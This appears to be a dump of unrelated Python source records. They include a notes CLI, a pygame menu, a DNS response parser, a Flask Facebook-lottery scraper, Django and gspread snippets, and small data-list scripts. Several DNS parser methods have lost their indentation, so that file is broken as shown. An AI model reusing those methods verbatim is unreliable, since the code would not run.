rpadding = 0p
</plot>
################################################################# bedg
<plot>
# construct the histogram based on bedg file.
type = histogram
file = {}
r1 = 0.73r
r0 = 0.54r
stroke_type = outline
thickness = 4
color = vdgrey
extend_bin = no
<backgrounds>
<background>
color = vvlgrey
</background>
</backgrounds>
<axes>
<axis>
spacing = 0.1r
color = lgrey
thickness = 2
</axis>
</axes>
############################################ bedg 2
</plot>
<plot>
# construct the histogram based on bedg file.
type = histogram
file = {}
r1 = 0.94r
r0 = 0.75r
# min = 0
# max = 5000
stroke_type = outline
thickness = 4
color = dgreen
extend_bin = no
<backgrounds>
<background>
color = vvlgrey
</background>
</backgrounds>
<axes>
<axis>
spacing = 0.1r
color = lgrey
thickness = 2
</axis>
</axes>
</plot>
</plots>
################################################################
# The remaining content is standard and required.
<image>
# Included from Circos distribution.
<<include etc/image.conf>>
</image>
# RGB/HSV color definitions, color lists, location of fonts, fill patterns.
# Included from Circos distribution.
<<include etc/colors_fonts_patterns.conf>>
# Debugging, I/O an dother system parameters
# Included from Circos distribution.
<<include etc/housekeeping.conf>>
""".format(args.bed, args.bed2))
# run circos
# NOTE(review): the script stops here -- args.circos is parsed but the
# circos binary is never actually invoked.
995,054 | f08492a27f89357815f1a35217ad986620ec7cb9 | from plumbum import cli, colors, local
import os
# Notes live in a fixed per-user directory; create it on first run.
path = "/home/mattia/.notes/"
if not os.path.exists(path):
    os.makedirs(path)
file = path + "notes.txt" # NOTE(review): shadows the legacy builtin name `file`
class Notes(cli.Application):
    "simple notes handler"
    # plumbum cli metadata shown in --help / --version
    PROGNAME = "Notes"
    VERSION = "0.2"
    def main(self):
        # Called when no subcommand was given: report it and exit non-zero.
        if not self.nested_command:
            print("No command given")
            return 1
@Notes.subcommand("add")
class add(cli.Application):
    "add a note given a string of character"
    priority = cli.Flag( ["p","prioritize"],
                        help = "if given, it will add a danger mark to the note")
    def main(self, *toadd: str):
        """Append one unticked '[ ] ...' line; -p appends a warning sign.

        BUGFIX: file handles are now closed (context manager), and the
        priority mark is honoured even when the notes file does not exist
        yet -- mode "a" creates the file, so the old "w+" dance (which
        silently dropped the -p mark on first use) is gone.
        """
        nota = " ".join(toadd)
        with open(file, "a") as notes:
            if self.priority:
                danger = colors.yellow | "\u26A0"
                notes.write("[ ] " + nota + " " + danger + "\n")
            else:
                notes.write("[ ] " + nota + "\n")
@Notes.subcommand("show")
class show(cli.Application):
    "show the notes file"
    def main(self):
        """Print the notes file verbatim (it already ends with a newline)."""
        if not os.path.exists(file):
            print("no notes.txt file found, try the option 'add' to write a new one")
        else :
            # BUGFIX: close the file handle instead of leaking it.
            with open(file, "r") as notes:
                print(notes.read(), end = "")
@Notes.subcommand("find")
class find(cli.Application):
    "search on notes file for keywords"
    def main(self, *keywords: str):
        """Case-insensitive substring search over the notes file.

        BUGFIX: the original tested `found is False` -- an identity
        comparison between an int counter and False that is never true --
        so the "key not found" message was unreachable.  The file handle
        is also closed now.
        """
        key = " ".join(keywords).lower()
        found = 0
        if not os.path.exists(file):
            print("no notes.txt file found")
        else :
            with open(file, "r") as notes:
                for line in notes:
                    if key in line.lower():
                        print(line)
                        found += 1
            if found == 0:
                print("key not found \n")
@Notes.subcommand("done")
class done(cli.Application):
    "check the notes that has been done, ask for a keyword"
    def main(self, *keywords: str):
        """Tick every note containing the keyword (case-insensitive).

        Rewrites the notes into a temporary copy, replacing '[ ]' with a
        green tick on matching lines, then moves the copy into place.

        BUGFIX: `found is False` compared an int against False by identity
        and could never be true, making "key not found" unreachable; the
        counter is now tested with equality.  File handles are closed via
        context managers.
        """
        key = " ".join(keywords).lower()
        found = 0
        if not os.path.exists(file):
            print("no notes.txt file found, add a note to create it")
        else :
            copy = "copynotes.txt"
            green_tick = colors.green | "\u2713"
            with open(path + copy, "w+") as c, open(file, "r") as f:
                for line in f:
                    if key in line.lower():
                        c.write(line.replace("[ ]", "[" + green_tick + "]"))
                        found += 1
                    else :
                        c.write(line)
            if found == 0:
                print("key not found")
            else:
                mv = local["mv"]
                mv(path+copy,file)
@Notes.subcommand("clear")
class clear(cli.Application):
    """it will clear ALL the notes if no options are given,\n
    else it will clear Notes with a given keyword.\n
    Flag -d will clear ticked notes.
    """
    done_clear = cli.Flag(["d","done"], help = "it will clear ticked notes")
    def main(self, *keywords : str):
        """Delete notes: everything, ticked ones (-d), or keyword matches.

        BUGFIX: the match counter was compared with `is 0` (identity, a
        CPython small-int accident); equality is used now.  The duplicated
        copy/filter/move logic of the two filtering branches is merged,
        and file handles are closed.
        """
        if not os.path.exists(file):
            print("no notes.txt file found, add a note to create it")
            return
        if len(keywords) == 0 and not self.done_clear:
            # No filter at all: wipe the whole notes file.
            rm = local["rm"]
            rm(file)
            return
        # Decide what a "line to delete" looks like for this invocation.
        if len(keywords) == 0 and self.done_clear:
            green_tick = colors.green | "\u2713"
            def matches(line):
                return green_tick in line
            not_found_msg = green_tick + " not found"
        else:
            key = " ".join(keywords).lower()
            def matches(line):
                return key in line.lower()
            not_found_msg = "keyword not found"
        # Rewrite the file into a copy, keeping only non-matching lines.
        copy = path + "copynotes.txt"
        found = 0
        with open(file, "r") as src, open(copy, "w+") as dst:
            for line in src:
                if matches(line):
                    found += 1
                else:
                    dst.write(line)
        if found == 0:
            print(not_found_msg, end = "\n")
        else:
            mv = local["mv"]
            mv(copy, file)
if __name__ == "__main__":
    Notes.run()
995,055 | fd5b9b3334554a3705b209651135ab2b5a3ea676 | import sys, os, pygame
from pygame.locals import *
from Scene import Scene
class menuScreen(Scene): #Menu class for the menu screen
    """Start-menu scene: draws a static background image; ENTER starts the
    game, ESC quits.

    NOTE(review): `self.game` is read in event() but never assigned here --
    presumably injected by the Scene framework; confirm.
    """
    def __init__(self, width=300,height=300):
        pygame.init()#starts pygame
        self.width=width#sets width of window
        self.height=height#sets height of window
        self.background=pygame.image.load(os.path.join("images","menuScreen.jpg"))#loads the image ready for use
        self.screen=pygame.display.set_mode((self.width,self.height))#displays the screen
    def draw(self):
        # Blit the menu background at the top-left corner every frame.
        self.screen.blit(self.background,(0,0))
    def update(self):
        # Menu has no per-frame state; this assignment is a placeholder.
        u=1
    def event(self,events):
        """
        Handle all input events here
        """
        for event in events:
            if event.type == KEYDOWN:
                if event.key == K_RETURN:#starts the game
                    self.game.gotoMain()
                    #print "r"
                if event.key == K_ESCAPE:#quits the game
                    sys.exit(0)
995,056 | 7fde4a17fa340847430bd2ac643a7a170236f94b | import struct
class DnsResponseBuilder():
    def __init__(self, data, query_length, url, q_id):
        """Wrap a raw DNS response packet.

        data         -- the full response message (bytes)
        query_length -- byte offset where the answer section starts
                        (i.e. the length of the echoed query message)
        url          -- the queried name, used when formatting answers
        q_id         -- id of the original query, matched against the response
        """
        self.header = {}        # parsed header fields (filled by create_header)
        self.records = []       # parsed resource records (filled by parse)
        self.data = data
        self.is_valid = False   # set by error_check
        self.length = query_length
        self.qtype = None       # type of the first record, set by parse
        self.url = url
        self.q_id = q_id
        self.additional = []    # formatted additional-section lines
        self.answer = None      # human-readable answer, set by decode_response
    def create_header(self):
        '''
        Parse the fixed 12-byte DNS header into self.header.

        The header consists of six 16-bit fields: identification, flags,
        question count, answer count, authority count and additional count.
        '''
        tuple_data_dns = struct.unpack('!HHHHHH', self.data[:12])
        data_to_pass = {}
        identification = tuple_data_dns[0]
        '''
        Identification number, used to match a response to its query when
        several DNS requests are in flight from the same machine.
        '''
        flags = tuple_data_dns[1]
        '''
        Flags are 16 bits, from most to least significant:
        QR (1 bit, 1 = response), Opcode (4 bits), AA (authoritative),
        TC (truncated), RD (recursion desired), RA (recursion available),
        Z/reserved (3 bits), RCODE (4 bits).
        '''
        data_to_pass['is_query'] = (flags & 32768) != 0          # QR bit (0x8000)
        data_to_pass['opcode'] = (flags & 30720) >> 11           # Opcode (0x7800)
        data_to_pass['auth_ans'] = (flags & 1024) != 0           # AA (0x0400)
        data_to_pass['truncated'] = (flags & 512) != 0           # TC (0x0200)
        data_to_pass['recursion_wanted'] = (flags & 256) != 0    # RD (0x0100)
        data_to_pass['recursion_supported'] = (flags & 128) != 0 # RA (0x0080)
        # NOTE(review): 0x0070 >> 4 extracts the Z/reserved bits; treating
        # "all zero" as present-in-zone looks questionable -- confirm intent.
        data_to_pass['present_in_zone'] = not(bool((flags & 112) >> 4))
        data_to_pass['rcode'] = flags & 15                       # RCODE (0x000F)
        data_to_pass['identification'] = identification
        data_to_pass['num_queries'] = tuple_data_dns[2]
        data_to_pass['num_response'] = tuple_data_dns[3]
        data_to_pass['num_authority'] = tuple_data_dns[4]
        data_to_pass['num_additional'] = tuple_data_dns[5]
        self.header = data_to_pass
def error_check(self):
rcode = self.header['rcode']
if rcode == 0:
self.is_valid = True
self.error = (0, 'NOERROR: Query Completed Successfully')
if self.header['identification'] != self.q_id:
self.error = (-1, 'Query ID and Response ID mismatch')
self.is_valid = False
else:
self.is_valid = False
if rcode == 1:
self.error = (1, 'FORMERR: Query Format Error')
elif rcode == 2:
self.error = (
2, 'SERVFAIL: Server failed to complete DNS request')
elif rcode == 3:
self.error = (3, 'NXDOMAIN: Domain Name does not exist')
elif rcode == 4:
self.error = (4, 'NOTIMP: Function not implemented')
elif rcode == 5:
self.error = (
5, 'REFUSED: The server refused to answer for the query')
elif rcode == 6:
self.error = (
6, 'YXDOMAIN: Name that should not exist, does exist')
elif rcode == 7:
self.error = (
7, 'XRRSET: RRset that should not exist, does exist')
elif rcode == 8:
self.error = (
8, 'NOTAUTH: Server not authoritative for the zone')
elif rcode == 9:
self.error = (9, 'NOTZONE: Name not in zone')
    def parse(self):
        """Parse the resource records that follow the echoed question.

        Each record header is read as (name, type, class, TTL, rdlength)
        via '!HHHLH' -- 12 bytes -- followed by rdlength bytes of data.
        self.qtype is set from the first parsed record.

        NOTE(review): '!HHHLH' assumes every record name is a 2-byte
        compression pointer; an uncompressed name would break the offsets.
        The loop also advances one shared counter against all three
        section counts, i.e. it reads max(answers, authority, additional)
        records -- confirm that is intended.
        """
        num = 0
        start = self.length  # answer section begins right after the query
        while num < self.header['num_response'] or num < self.header['num_authority'] or num < self.header['num_additional']:
            tuple_data_dns = struct.unpack(
                '!HHHLH', self.data[start:start + 12])
            data_to_pass = {}
            data_to_pass['name'] = tuple_data_dns[0]
            data_to_pass['qtype'] = tuple_data_dns[1]
            data_to_pass['qclass'] = tuple_data_dns[2]
            data_to_pass['ttl'] = tuple_data_dns[3]
            data_to_pass['response_length'] = tuple_data_dns[4]
            data_to_pass['response_data'] = self.data[start +12:start + 12 + tuple_data_dns[4]]
            num += 1
            # Advance past this record's header + payload.
            start += data_to_pass['response_length'] + 12
            self.records.append(data_to_pass)
        self.qtype = self.records[0]['qtype']
    def decode_response(self):
        """Format the parsed answer records into human-readable text.

        Dispatches on self.qtype (type of the first record) and stores the
        formatted output in self.answer; additional-section A/AAAA glue
        records are rendered into self.additional.
        """
        if self.qtype == 1:  # A
            result = self.decode_A(self.records[:self.header['num_response']])
            answer = 'Name: ' + result[0] + '\n' + 'Address: ' + result[1]
            self.answer = answer
        elif self.qtype == 28:  # AAAA
            result = self.decode_AAAA(self.records[:self.header['num_response']])
            answer = 'Name: ' + result[0] + '\n' + 'Address: ' + result[1]
            self.answer = answer
        elif self.qtype == 2:  # NS
            result = self.decode_NS(self.records[:self.header['num_response']])
            answer = ''
            for line in result:
                answer += self.url + '\t nameserver = ' + line + '\n'
            self.answer = answer
        elif self.qtype == 6:  # SOA
            result = self.decode_SOA(self.records[:self.header['num_response']])
            answer = self.url + '\n'
            answer += '\t orgin: ' + result[0] + '\n'
            answer += '\t mail addr: ' + result[1] + '\n'
            answer += '\t serial: ' + str(result[2]) + '\n'
            answer += '\t refresh: ' + str(result[3]) + '\n'
            answer += '\t retry: ' + str(result[4]) + '\n'
            answer += '\t expire: ' + str(result[5]) + '\n'
            answer += '\t minimum: ' + str(result[6]) + '\n'
            self.answer = answer
        elif self.qtype == 16:  # TXT
            result = self.decode_TXT(self.records[:self.header['num_response']])
            answer = ''
            for line in result:
                answer += self.url + '\t' + line + '\n'
            self.answer = answer
        elif self.qtype == 15:  # MX
            result = self.decode_MX(self.records[:self.header['num_response']])
            answer = ''
            for line in result:
                answer += self.url + '\t mail exchanger = ' + \
                    str(line[0]) + ' ' + line[1] + '\n'
            self.answer = answer
        elif self.qtype == 12:  # PTR
            result = self.decode_PTR(self.records[:self.header['num_response']])
            answer = ''
            for line in result:
                answer += self.url + '\t name = ' + line
            self.answer = answer
        else:
            self.answer = 'The option is invalid'
        if self.header['num_additional'] != 0:
            # Glue records: names are assumed to line up positionally with
            # the NS answers decoded above.
            # NOTE(review): the AAAA branch decrements then re-increments
            # 'index', so an AAAA glue record reuses the PREVIOUS NS name —
            # confirm this A/AAAA same-host pairing is intended.
            temp = self.decode_NS(self.records[:self.header['num_response']])
            index = 0
            for record in self.records[self.header['num_response']:]:
                if record['qtype'] == 1:
                    self.additional.append("{} has an internet address = {}\n".format(temp[index], self.decode_A([record])[1]))
                    index += 1
                elif record['qtype'] == 28:
                    index -= 1
                    self.additional.append("{} has AAAA address = {}\n".format(temp[index], self.decode_AAAA([record])[1]))
                    index += 1
            self.additional = ''.join(self.additional)
def decode_A(self, records):
data = struct.unpack('!BBBB', records[0]['response_data'])
data = list(map(lambda num: str(num), data))
return (self.url, ('.'.join(data)))
    def decode_AAAA(self, records):
        """Decode an AAAA record (16 bytes) into an IPv6 string.

        Returns (self.url, address). Zero-group compression is hand-rolled:
        runs of all-zero 16-bit groups collapse to '' so ':'.join() yields
        '::'-style output.
        """
        # Four 32-bit words -> eight 4-hex-digit groups.
        data = struct.unpack('!LLLL', records[0]['response_data'])
        result = []
        for num in data:
            test = str(hex(num)[2:])
            test = '0' * (8 - len(test)) + test  # zero-pad to 8 hex digits
            result.append(test[:4])
            result.append(test[4:])
        final = []
        for index, num in enumerate(result):
            test = num.lstrip('0')
            if test != '':
                final.append(test)
            else:
                # Collapse a run of zero groups: drop the following zero
                # groups and emit '' so join() produces '::'.
                # NOTE(review): result[index + 1] raises IndexError when the
                # address ENDS in zero groups (e.g. '...::') — confirm and
                # guard if such input can occur.
                temp = ''
                flag = 0
                while temp == '':
                    temp = result[index + 1].lstrip('0')
                    if temp == '':
                        result.pop(index + 1)
                        flag = 1
                if flag == 0:
                    final.append('0')  # isolated zero group stays '0'
                else:
                    final.append('')
        answer = ':'.join(final)
        return (self.url, answer)
def decode_NS(self, records):
first_record = records[0]
length = first_record['response_data'][0]
bstream = 'c' * length
data = struct.unpack(
bstream, first_record['response_data'][1: length + 1])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
result = [''.join(data)]
try:
pointer = struct.unpack(
'BB', first_record['response_data'][length + 1:])
if pointer[0] >> 6 == 3:
suffix = self.solve_pointer(pointer[1])
except Exception:
length = length + 1
suffix = ''
while length < first_record['response_length'] - 1:
newlen = first_record['response_data'][length]
if newlen == 192:
suffix += self.solve_pointer(first_record['response_data'][length + 1])
break
bstream = 'c' * newlen
data = struct.unpack(
bstream, first_record['response_data'][length + 1: length + 1 + newlen])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
suffix += ''.join(data) + '.'
length += newlen + 1
result[0] += '.' + suffix
for record in records[1:]:
length = first_record['response_data'][0]
bstream = 'c' * length
data = struct.unpack(
bstream, record['response_data'][1: length + 1])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
result.append(''.join(data) + '.' + suffix)
return result
def decode_TXT(self, records):
result = []
for record in records:
result.append(str(record['response_data'][1:], 'utf-8'))
return result
    def decode_MX(self, records):
        """Decode MX records into (preference, exchange-name) tuples.

        response_data layout: 2-byte preference, then a DNS-encoded name
        (length-prefixed labels, optionally ending in a 0xC0 compression
        pointer resolved via solve_pointer()).
        """
        answer = []
        for record in records:
            # NOTE(review): reads only the LOW byte of the 16-bit
            # preference field — fine for values < 256, confirm otherwise.
            pref = record['response_data'][1]
            i = 2
            result = ''
            while i < record['response_length'] - 2:
                length = record['response_data'][i]
                if length != 192:
                    # Plain label: copy 'length' chars and append a dot.
                    bstream = 'c' * length
                    data = struct.unpack(
                        bstream, record['response_data'][i + 1: i + 1 + length])
                    data = list(map(lambda letter: str(letter, 'utf-8'), data))
                    data = ''.join(data)
                    result += data + '.'
                    i += 1 + length
                else:
                    # Compression pointer inside the name.
                    result += self.solve_pointer(
                        record['response_data'][i + 1])
                    i += 1
            # A pointer sitting in the last two bytes, past the loop window.
            if record['response_data'][i] == 192:
                result += self.solve_pointer(
                    record['response_data'][i + 1]) + '.'
            answer.append((pref, result))
        return answer
    def decode_SOA(self, records):
        """Decode an SOA record.

        Returns [mname, rname, serial, refresh, retry, expire, minimum]:
        two DNS-encoded names followed by five big-endian 32-bit integers.
        """
        i = 0
        answer = []
        result = ''
        record = records[0]
        # --- primary name server (mname): labels until a 0 terminator or
        # a 0xC0 compression pointer resolved via solve_pointer(). ---
        while True:
            length = record['response_data'][i]
            if length == 192:
                result += self.solve_pointer(
                    record['response_data'][i + 1]) + '.'
                i += 2
                break
            elif length == 0:
                i += 1
                break
            else:
                bstream = 'c' * length
                data = struct.unpack(
                    bstream, record['response_data'][i + 1: i + 1 + length])
                data = list(map(lambda letter: str(letter, 'utf-8'), data))
                result += ''.join(data) + '.'
                i += length + 1
        answer.append(result)
        # --- responsible mailbox (rname). Scan ahead for a compression
        # pointer; if one exists the name is "first label + pointer
        # suffix", otherwise parse labels exactly as above. ---
        j = i
        while j < len(record['response_data']) and record['response_data'][j] != 192:
            j += 1
        result = ''
        if j != len(record['response_data']):
            bstream = 'c' * record['response_data'][i]
            data = struct.unpack(bstream, record['response_data'][i + 1: j])
            data = list(map(lambda letter: str(letter, 'utf-8'), data))
            result += ''.join(data) + '.' + \
                self.solve_pointer(record['response_data'][j + 1])
            i = j + 2
        else:
            while True:
                length = record['response_data'][i]
                if length == 192:
                    result += self.solve_pointer(
                        record['response_data'][i + 1]) + '.'
                    i += 2
                    break
                elif length == 0:
                    i += 1
                    break
                else:
                    bstream = 'c' * length
                    data = struct.unpack(
                        bstream, record['response_data'][i + 1: i + 1 + length])
                    data = list(map(lambda letter: str(letter, 'utf-8'), data))
                    result += ''.join(data) + '.'
                    i += length + 1
        answer.append(result)
        # --- five 32-bit counters. Each byte is weighted 16**(2*(3-k)),
        # i.e. 256**(3-k): big-endian reconstruction without '!L'. The
        # inner loop reuses the name 'index'; the outer range iterator is
        # unaffected by that rebinding.
        for index in range(0, len(record['response_data'][i:]), 4):
            data = struct.unpack(
                'BBBB', record['response_data'][i + index: i + index + 4])
            result = []
            for index, num in enumerate(data):
                result.append(data[index] * (16 ** (2 * (3 - index))))
            answer.append(sum(result))
        return answer
def decode_PTR(self, records):
final = []
for record in records:
newlen = 0
data = record['response_data']
result = ''
answer = []
while newlen < len(record['response_data']):
length = data[newlen]
if length == 0:
break
if length == 192:
answer.append(self.solve_pointer(
record['response_data'][newlen + 1]))
break
bstream = 'c' * length
result = struct.unpack(
bstream, data[newlen + 1: newlen + 1 + length])
newlen += length + 1
result = list(map(lambda letter: str(letter, 'utf-8'), result))
answer.append(''.join(result))
final.append('.'.join(answer))
return final
    def solve_pointer(self, start):
        """Follow a DNS compression pointer.

        Reads length-prefixed labels from self.data starting at offset
        *start* until a 0 terminator, resolving nested pointers
        recursively; returns the labels joined with dots.
        """
        i = start
        result = []
        while True:
            length = self.data[i]
            if length == 0:
                break
            elif length == 192:
                # Nested compression pointer: resolve recursively.
                # NOTE(review): there is no continue/break here, so
                # execution falls into the unpack below with length=192 and
                # relies on struct.error to exit the loop — confirm this is
                # intentional rather than a missing 'break'.
                result.append(self.solve_pointer(self.data[i + 1]))
            try:
                bstream = length * 'c'
                data = struct.unpack(bstream, self.data[i + 1: i + 1 + length])
                data = list(map(lambda letter: str(letter, 'utf-8'), data))
                data = ''.join(data)
                i += 1 + length
                result.append(data)
            except Exception:
                # Ran past the end of the packet: stop with what we have.
                break
        return '.'.join(result)
if __name__ == '__main__':
    # This module only defines the query/response parsing class; the CLI
    # entry point lives in dns.py.
    print('This is the file for the query class, run dns.py instead')
|
995,057 | 0ed556cd830050ec2b90cca708e95e112b10eef3 | # encoding=UTF-8
from flask import Flask, render_template, request, Response, redirect
import scraper
import lottery
import people_filter
import json
from config import config
import hw
app = Flask(__name__)
@app.after_request
def add_header(response):
    # Dev convenience: cap client-side caching at 1 second so edits to
    # templates/static assets show up immediately (original note:
    # "disabled cached when debugging").
    response.cache_control.max_age = 1
    return response
@app.route('/hw', methods=['POST'])
def do_hw():
    """Resolve a link for the posted food name and redirect the client."""
    target = hw.run(request.form['food_name'])
    return redirect(target, code=302)
@app.route('/')
def index():
    # Render the landing page; the Google API key is injected into the
    # template from config.
    return render_template('index.html', google_key=config.google_key)
@app.route('/scrapy', methods=['POST'])
def scrapy():
    """Scrape a Facebook post and return the list of eligible entrants.

    Expects a JSON body with:
      post_link       -- URL of the post to scrape
      need_like       -- if truthy, entrants must also have liked the post
      comment_options -- optional {tag, text} constraints on comments
      csv_options     -- optional {type, data} whitelist filter

    Returns a JSON array of {name, url, comment, time} dicts on success,
    or a 400 response carrying the scraper's error message.

    (Cleanup: removed a multi-kilobyte commented-out sample result list and
    a leftover debug print from the exception handler.)
    """
    req = request.get_json()
    if 'comment_options' in req:
        comment_options = {
            'TAGS': int(req['comment_options']['tag']),
            'TEXT': req['comment_options']['text']
        }
    else:
        # No comment constraints: match any comment.
        comment_options = {
            'TAGS': 0,
            'TEXT': ""
        }
    try:
        post_url = req['post_link']
        need_like = req['need_like']
        like_people_list, comment_people_list = scraper.run(post_url, comment_options, need_like)
    except Exception as e:
        # Surface scraper failures to the client as a 400 with the message.
        return str(e), 400
    if need_like:
        lottery_people_list = people_filter.filter_like(comment_people_list, like_people_list)
    else:
        lottery_people_list = comment_people_list
    if 'csv_options' in req:
        options = req['csv_options']
        index_type = options['type']
        csv_people_list = options['data']
        lottery_people_list = people_filter.filter_csv(csv_people_list, index_type, lottery_people_list)
    # NOTE(review): assumes each entry is a 4-tuple (name, url, comment,
    # time); verify scraper.run / people_filter really return 4-tuples.
    final_list = [{'name': d[0], 'url': d[1], 'comment': d[2], 'time': d[3]}
                  for d in lottery_people_list]
    return Response(json.dumps(final_list), mimetype='application/json')
@app.route('/lottery', methods=['POST'])
def get_lottery():
    """Draw winners from the previously scraped entrant list."""
    payload = request.get_json()
    try:
        winners = lottery.run(payload['prize'], payload['legal_list'])
    except KeyError:
        # Either key missing means the scrape step has not run yet.
        return "請先爬取中獎名單!", 400
    return Response(json.dumps(winners), mimetype='application/json')
@app.route('/test')
def apptest():
    # Standalone page used for manual front-end testing.
    return render_template('test.html')
if __name__ == "__main__":
    # Development server only: debug enabled, fixed port 3000.
    app.config['ENV'] = "development"
    app.config['DEBUG'] = True
    app.run(port=3000)
995,058 | 83a502277c9f9ec3095a97430065c1e691fbe18c | from django.apps import AppConfig
class VistorsConfig(AppConfig):
    # Django app configuration for the 'vistors' app.
    # NOTE(review): "vistors" looks like a typo for "visitors", but the app
    # label is referenced by settings/migrations, so renaming is a breaking
    # change — confirm before fixing.
    name = 'vistors'
|
995,059 | 36a6806024ae53da2faca67a92308a444ca8bd9f | import gspread
from oauth2client.service_account import ServiceAccountCredentials
# OAuth scopes: spreadsheet and Drive access for the service account.
scope=[
'https://www.googleapis.com/auth/spreadsheets',
'https://www.googleapis.com/auth/drive',
]
# Service-account key file; keep this credential out of version control.
json_file_name='diesel-monitor-283800-7f744adca4c3.json'
credentials=ServiceAccountCredentials.from_json_keyfile_name(json_file_name,scope)
gc=gspread.authorize(credentials)
# Open worksheet "Sheet1" of the spreadsheet named "bob".
worksheet=gc.open("bob").worksheet("Sheet1")
#worksheet.update('A1',100)
#worksheet.update('B1',100)
|
995,060 | 785625ae82786beee6fd88fa00bc944259c4f7c7 | # uvicorn app_assetmgr:app --port 8001 --reload
|
995,061 | 58c7df059139cfcbc5d2f0f038e6ab36690d50e3 | data_path='/data4/jiali/data/iso_train'
import os
# Counter used only for progress reporting (Python 2 script).
count=1
# Feature flags selecting which listing task to run.
lstm1=0
lstm2=1
if lstm1:
    # Walk every clip directory under data_path and collect RGB frame
    # image paths into lstm_rgb_list.txt.
    # NOTE(review): fimg is never closed and paths are written without a
    # newline separator — confirm whether that is intended.
    dirs=os.listdir(data_path)
    fimg=open('lstm_rgb_list.txt','w')
    # fflow=open('lstm_flow.list.txt','w')
    for dir in dirs:
        files=os.listdir(os.path.join(data_path,dir))
        for file in files:
            count+=1
            if count %10000==0:
                print '{} files processed'.format(count)
            if file.startswith('img'):
                fimg.write(os.path.join(data_path,dir,file))
if lstm2:
    # Rewrite the test list, prefixing paths with the absolute data root
    # on the target machine.
    with open('test_rgb_list.txt','r') as fr:
        with open('test_lstm_rgb_list.txt','w') as fw:
            lines=fr.readlines()
            for line in lines:
                count+=1
                label=line.split(' ')[1]
                # path=line.split(' ')[0].split('/')[-1]
                tmp=os.path.join('/home/duanjiali/data/IsoGD/',line.split(' ')[0])
                fw.write(tmp+' '+str(label))
                if count %1000==0:
                    print '{} files procesed'.format(count)
995,062 | 9740e680777bcd1330a816fd5a5a29d5ca3dedaa | from .base import *
# Production override: never run with debug enabled outside development.
DEBUG = False
# Add any production-specific (but not server-specific) configuration here.
995,063 | 473a6a86062c9ef3782a06651055420be02b14ac | import os
import numpy as np
import glob
import datetime
figures_dir = './figures'
import argparse
import time
if __name__ == '__main__':
    # CLI: watch experiment figure folders and periodically stitch the
    # most recently modified ones into combined images.
    ap = argparse.ArgumentParser()
    ap.add_argument('min_h_since_modified', type=float, default=24, nargs='?')
    ap.add_argument('-d', '--exp_dir', nargs='?', type=str, default='experiments', dest='experiments_root')
    ap.add_argument('-f', '--filter', nargs='*', default=[], type=str,
                    help='List of terms to filter for (if multiple, they will be ANDed)')
    ap.add_argument('-r', '--repeat_every', type=float, default=60, nargs='?')
    args = ap.parse_args()
    while True:
        all_experiments_figs_dirs = []
        # check all experiments in experiments_root for figures directories
        for exp_dir in os.listdir(args.experiments_root):
            if os.path.isdir(os.path.join(args.experiments_root, exp_dir)):
                for sub_dir in os.listdir(os.path.join(args.experiments_root, exp_dir)):
                    # look only for the figures subdirectory in each experiment
                    if 'figures' in sub_dir and os.path.isdir(os.path.join(args.experiments_root, exp_dir, sub_dir)):
                        all_experiments_figs_dirs.append(os.path.join(args.experiments_root, exp_dir, sub_dir))
        # get modified times for each figures directory
        dir_modified_times = [datetime.datetime.fromtimestamp(os.path.getmtime(figs_dir)) for figs_dir in all_experiments_figs_dirs]
        # sort dirs and dir modified times by modified time (oldest first)
        sorted_dirs, sorted_times = [list(x) for x in zip(*sorted(zip(all_experiments_figs_dirs, dir_modified_times),
                                                                  key=lambda dir_time_pair:dir_time_pair[1]))]
        time_since_modified = [(datetime.datetime.now() - t) for t in sorted_times]
        hours_since_modified = [t.days * 24 + t.seconds / 3600. for t in time_since_modified]
        n_experiment_dirs = len(hours_since_modified)
        # show at most the 10 most recently modified experiments
        print('Hours since modified\tDir')
        for i in range(max(n_experiment_dirs - 10, 0), n_experiment_dirs):
            print('{}\t\t\t{}'.format(round(hours_since_modified[i], 1), sorted_dirs[i]))
        # Keep only dirs modified within the requested window, then apply
        # the AND-ed substring filters.
        latest_dirs = [d for i, d in enumerate(sorted_dirs) if hours_since_modified[i] < args.min_h_since_modified]
        if len(args.filter) > 0:
            latest_dirs = [d for d in latest_dirs if np.all([ft in d for ft in args.filter])]
        model_names = [os.path.basename(os.path.split(ld)[0]) for ld in latest_dirs]
        print('Combining images from each of {}'.format(model_names))
        # NOTE(review): directory/model names are interpolated into a shell
        # command; names with spaces or shell metacharacters will break (or
        # worse) — consider subprocess.run with an argument list.
        os.system('python ~/evolving_wilds/scripts/combine_images.py {} -out_names {}'.format(' '.join(latest_dirs),
                                                                                              ' '.join(model_names)))
        time.sleep(args.repeat_every)
|
995,064 | dc517a5f133292a0d6a0b5c39a942a3332d2a8d6 | import random
class Option():
    """Scrabble-style word scoring against a dictionary file.

    Loads 'dictionary.txt' (one word per line) at construction time and
    scores words using Polish Scrabble letter values.
    """

    def __init__(self):
        # Close the dictionary file deterministically (the original left it
        # to the garbage collector — a resource leak on non-CPython).
        with open('dictionary.txt', 'r') as handle:
            self.file = [line.rstrip('\n').upper() for line in handle]
        SCRABBLES_SCORES = [(1, "E A O I N R T L S U"), (2, "D G"), (3, "B C M P"),
                            (4, "F H V W Y"), (5, "K"), (8, "J X"), (10, "Q Z"),
                            (11, "Ą Ć Ę Ł Ń Ó Ś Ź Ż")]
        # Kept as a module-level global for backward compatibility: the
        # scoring methods (and possibly external code) reference it.
        global LETTER_SCORES
        LETTER_SCORES = {letter: score for score, letters in SCRABBLES_SCORES
                         for letter in letters.split()}

    def score_from_word(self, word):
        """Return the total letter score of *word* (case-insensitive).

        Letters without a score entry contribute 0.
        """
        score = 0
        for letter in word.upper():
            if letter in LETTER_SCORES:
                score += LETTER_SCORES[letter]
        return score

    def score_from_file(self):
        """Return the highest word score found in the dictionary file."""
        return max(sum(LETTER_SCORES[c] for c in word) for word in self.file)

    def word_from_score(self, score):
        """Print a random dictionary word whose score equals *score*.

        Prints an empty string when no word matches.
        """
        valid_words = [word for word in self.file
                       if sum(LETTER_SCORES[letter] for letter in word) == score]
        if valid_words:
            print(random.choices(valid_words))
        else:
            print('')
|
995,065 | ab78e04fe58d97daae7e712729aa9a4ff0ed9fc4 | from django.urls import path, include
from pomelo.settings import api_settings
from .views import ImageViewSet
# The router class is configurable via settings so the project can swap
# router implementations without touching this module.
RouterClass = api_settings.DEFAULT_ROUTER
router = RouterClass()
router.register('image', ImageViewSet)
urlpatterns = [
    path('', include((router.urls, 'pomelo'), namespace='pomelo')),
]
|
